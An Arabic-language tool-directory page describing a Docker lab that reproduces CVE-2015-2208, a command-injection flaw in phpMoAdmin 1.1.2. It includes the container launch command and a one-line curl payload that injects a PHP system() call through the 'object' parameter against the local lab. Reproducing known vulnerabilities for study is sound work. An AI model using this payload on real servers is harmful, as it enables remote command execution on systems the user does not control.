Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2015-2208 — محاكاة Docker لثغرة cve-2015-2208 | Kitploit
أدوات/GitHubGitHub/ptantiku/cve-2015-2208
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubptantiku/cve-2015-2208

cve-2015-2208

محاكاة Docker لثغرة cve-2015-2208

عرض المستودع
23منذ 11 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

#ملف Dockerfile لمحاكاة البيئة لـ CVE-2015-2208#

وظيفة saveObject في ملف moadmin.php في phpMoAdmin 1.1.2 تسمح للمهاجمين عن بعد بتنفيذ أوامر عشوائية عبر أحرف shell الخاصة في معامل object.

اكتشف بواسطة: @u0x (Pichaya Morimoto)، Xelenonz، pe3z، Pistachio

المراجع:

  • http://seclists.org/fulldisclosure/2015/Mar/19
  • http://www.exploit-db.com/exploits/36251/
  • https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2208

##بيئة الاختبار##

root@kitploit:~
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##الاستغلال##

root@kitploit:~
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'
تنزيل الأداة